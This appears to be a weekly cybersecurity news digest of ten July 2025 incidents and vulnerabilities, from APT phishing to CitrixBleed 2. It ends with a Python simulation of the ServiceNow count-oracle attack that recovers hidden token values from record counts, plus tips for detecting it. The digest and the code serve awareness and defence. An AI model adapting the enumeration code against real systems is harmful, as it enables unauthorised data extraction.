WEEKLY TOP TEN: July 14, 2025, 16:00 GMT
- DoNot APT Group Targets European Government Entities
The DoNot APT group (also tracked as APT-C-35, Mint Tempest, and Origami Elephant) has targeted a European foreign affairs ministry, a departure from its focus since 2016 on South Asian government entities. The intrusion began with a spear-phishing email impersonating Italian defense officials and referencing a visit to Bangladesh; a Google Drive link delivered a password-protected RAR archive containing the LoptikMod malware disguised as a PDF document. The malware persisted through a scheduled task that ran every 10 minutes and attempted to contact a command-and-control server at totalservices[.]info, although that infrastructure was inactive at the time of analysis.
- McDonald’s AI Hiring System Exposed 64 Million Applicants
Security researchers Ian Carroll and Sam Curry found that the McHire platform, used by roughly 90% of McDonald’s franchises, still accepted the default credentials 123456/123456 (the same string as username and password). Combined with an insecure direct object reference (IDOR) on an internal API, this gave access to more than 64 million job applicant records, including names, email addresses, phone numbers, and authentication tokens. The issue was fixed within hours of being reported, but the exposed contact details are exactly what is needed for convincing recruitment-themed phishing against applicants.
- Malicious Browser Extensions Infect 2.3 Million Users
Koi Security researchers uncovered the “RedDirection” campaign: 18 malicious Chrome and Edge extensions, posing as productivity tools such as color pickers and video controllers, with more than 2.3 million installs between them. The extensions behaved benignly for years, accumulating trust signals such as Google’s verified badges and high install counts, before malicious code arrived through silent auto-updates. The malicious versions fire on every tab update, report the user’s browsing to command-and-control infrastructure, and can redirect the browser to fraudulent pages on instruction. Store review that vets the initially submitted code but not subsequent updates does not catch this pattern, which is the systemic failure the campaign exposes.
- Fortinet FortiWeb Pre-Auth RCE Vulnerability Disclosed
CVE-2025-25257 is a pre-authentication SQL injection in the Fabric Connector component of Fortinet FortiWeb; watchTowr published a detailed analysis of the flaw, which lets an unauthenticated attacker run arbitrary SQL through a crafted HTTP request. Because the database runs as root, a SELECT ... INTO OUTFILE statement turns the injection into an arbitrary file write as root, which in turn can be escalated to remote code execution on the appliance. The vulnerable code is the get_fabric_user_by_token function, which authenticates other Fortinet products connecting to the FortiWeb API for integration, so the injection point is reachable without any valid credentials.
- Critical Malware Found in GravityForms Official Plugin
Patchstack received reports that copies of the GravityForms plugin, version 2.9.12, downloaded from the official gravityforms.com site contained malicious code that exfiltrated system information to the recently registered domain gravityapi.org. The tainted package carried two backdoors: one in the update_entry_detail function that sends data about the WordPress site to the attackers, and a second in the list_sections function that, when presented with a hardcoded secret key, allows remote code execution, user account manipulation, and file operations. GravityForms released version 2.9.13 on July 11, 2025, to remove the backdoor, and Namecheap suspended gravityapi.org. Sites that installed 2.9.12 from a downloaded package should reinstall a clean build and check for administrator accounts they did not create.
- PerfektBlue Bluetooth Vulnerabilities Affect Millions of Vehicles
PCA Cyber Security researchers identified four vulnerabilities in OpenSynergy’s BlueSDK Bluetooth stack (CVE-2024-45431 through CVE-2024-45434) that can be chained into remote code execution on the infotainment systems of millions of vehicles, including models from Mercedes-Benz, Volkswagen, and Skoda. The chain, dubbed “PerfektBlue,” needs at most a single user click during pairing, after which an attacker can track GPS coordinates, record audio inside the cabin, and potentially move laterally to other vehicle ECUs. OpenSynergy confirmed the flaws and shipped patches to its customers in September 2024, but because BlueSDK is embedded in products across the automotive and other industries, a given device is fixed only once its manufacturer has pushed the update, and millions likely remain exposed.
- Ruckus Networks Leaves Critical Flaws Unpatched
Noam Moshe of Claroty’s Team82 reported nine vulnerabilities, several of them critical, in Ruckus Wireless Virtual SmartZone (vSZ) and Ruckus Network Director (RND), ranging from hardcoded SSH keys to unauthenticated remote code execution. The most severe issue is a default RSA key pair shipped on the devices: anyone who obtains the private key can connect to a vulnerable device as root. Other flaws allow authentication bypass and arbitrary file access. No patches are available for these enterprise wireless management systems, and neither Ruckus Networks nor its parent company CommScope has responded to disclosure attempts, so restricting network access to the vSZ and RND management interfaces is the only mitigation for now.
- ServiceNow Vulnerability Allows Data Extraction via Count(er) Strike
Varonis Threat Labs disclosed CVE-2025-3648, dubbed “Count(er) Strike,” a high-severity flaw in the ServiceNow platform that lets a user infer and extract data they are not permitted to read, including PII, credentials, and financial information, from the record counts the UI displays. The weakness is in how Access Control List (ACL) rules are evaluated: a query whose data condition fails is still answered with the number of matching records, and by issuing queries with operators such as STARTSWITH or CONTAINS an attacker can narrow a hidden field value down one character at a time. ServiceNow shipped patches in May 2025 and added new controls, Query ACLs and Security Data Filters, but customers must still review their table configurations to confirm the new protections are actually applied.
- TapTrap Android Attack Bypasses Permissions Using Invisible UI
Researchers from TU Wien and the University of Bayreuth developed TapTrap, a tapjacking technique that abuses Android’s activity transition animations so that a permission dialog is on screen and receiving touches while being effectively invisible to the user. A custom transition animation with an alpha of roughly 0.01 renders the sensitive system prompt nearly transparent yet still lets it receive touch events, so taps intended for the malicious app’s own UI land on the prompt’s buttons, granting access to the camera, microphone, location, and even device administrator privileges. Of 99,705 Android apps analyzed from the Play Store, 76.3% were found to be vulnerable to TapTrap, though no evidence of exploitation in the wild has been found.
- CitrixBleed 2 Memory Disclosure Vulnerability Discovered
watchTowr researchers disclosed CVE-2025-5777, dubbed “CitrixBleed 2,” a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway that lets an unauthenticated attacker read memory contents by sending malformed POST requests to the login endpoint. The bug resembles the original CitrixBleed (CVE-2023-4966): each request leaks roughly 127 bytes of memory, and repeated requests can recover user session tokens, which an attacker can replay to hijack sessions and bypass multi-factor authentication. The researchers initially withheld technical details but eventually published their analysis, citing the minimal information coming from Citrix, which left customers unable to judge whether they needed to raise an internal alarm.
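The Count(er) Strike item above describes record counts as an oracle for enumerating values with STARTSWITH queries. The following added example, written for this digest and not Varonis’s or ServiceNow’s code, simulates that inference in Python: the sample rows, the alphabet, and the CountOracle interface are constructed assumptions, and nothing here talks to a real ServiceNow instance. It goes slightly beyond the item by recovering every distinct value in a field rather than one, and by handling values that are prefixes of other values.

```python
import string

# Constructed sample table for the simulation. In the scenario the digest
# describes, the attacker cannot read these rows; the only thing that leaks
# is how many rows match a query condition.
SAMPLE_ROWS = [
    {"user": "alice", "api_token": "tk_4f9a2c"},
    {"user": "bob", "api_token": "tk_77b1e0"},
    {"user": "carol", "api_token": "tk_77b1e0ff"},  # bob's token is a prefix of this one
]

# Candidate characters tried at each position (an assumption about the data).
ALPHABET = string.ascii_lowercase + string.digits + "_"


class CountOracle:
    """Hypothetical stand-in for the leaky ACL behaviour: row contents are
    withheld, but the number of rows matching the condition is returned."""

    def __init__(self, rows):
        self.rows = rows
        self.queries = 0  # round trips spent; the attack's only real cost

    def count(self, field, operator, value):
        self.queries += 1
        if operator == "STARTSWITH":
            return sum(1 for r in self.rows if r[field].startswith(value))
        if operator == "CONTAINS":
            return sum(1 for r in self.rows if value in r[field])
        raise ValueError(f"unsupported operator {operator!r}")


def enumerate_field(oracle, field, alphabet=ALPHABET, max_len=64):
    """Recover every distinct value of `field` using only STARTSWITH counts.

    Walks the prefix tree depth-first. For each prefix, the oracle is asked
    how many rows start with prefix + ch for every ch in the alphabet; the
    difference between the prefix's own count and the sum of its children's
    counts is the number of rows whose value is exactly that prefix, which
    is what makes values that are prefixes of other values recoverable.
    Returns {value: number_of_rows_with_that_value}."""
    found = {}
    stack = [("", oracle.count(field, "STARTSWITH", ""))]
    while stack:
        prefix, total = stack.pop()
        if len(prefix) >= max_len:
            found[prefix] = total  # stop extending; report the rows sharing this prefix
            continue
        children = []
        for ch in alphabet:
            n = oracle.count(field, "STARTSWITH", prefix + ch)
            if n:
                children.append((prefix + ch, n))
        exact = total - sum(n for _, n in children)
        if exact > 0:
            found[prefix] = exact
        stack.extend(reversed(children))  # reversed so alphabetical order pops first
    return found


if __name__ == "__main__":
    oracle = CountOracle(SAMPLE_ROWS)
    tokens = enumerate_field(oracle, "api_token")
    print(tokens, "recovered with", oracle.queries, "count queries")
```

Each recovered character costs at most one query per alphabet symbol, so a 32-character token over this 37-symbol alphabet falls in about 1,200 requests. That linear cost, with no guesswork involved, is why a count leak is a data-disclosure bug rather than a curiosity, and it is also the shape a detection rule should look for: one user issuing long runs of STARTSWITH or CONTAINS queries against the same table with filter values that grow by a single character each time.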
Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The ten stories above were selected from the 40+ original items we judged most significant over the course of the week, ranked by highest risk, with multiple sources used where available.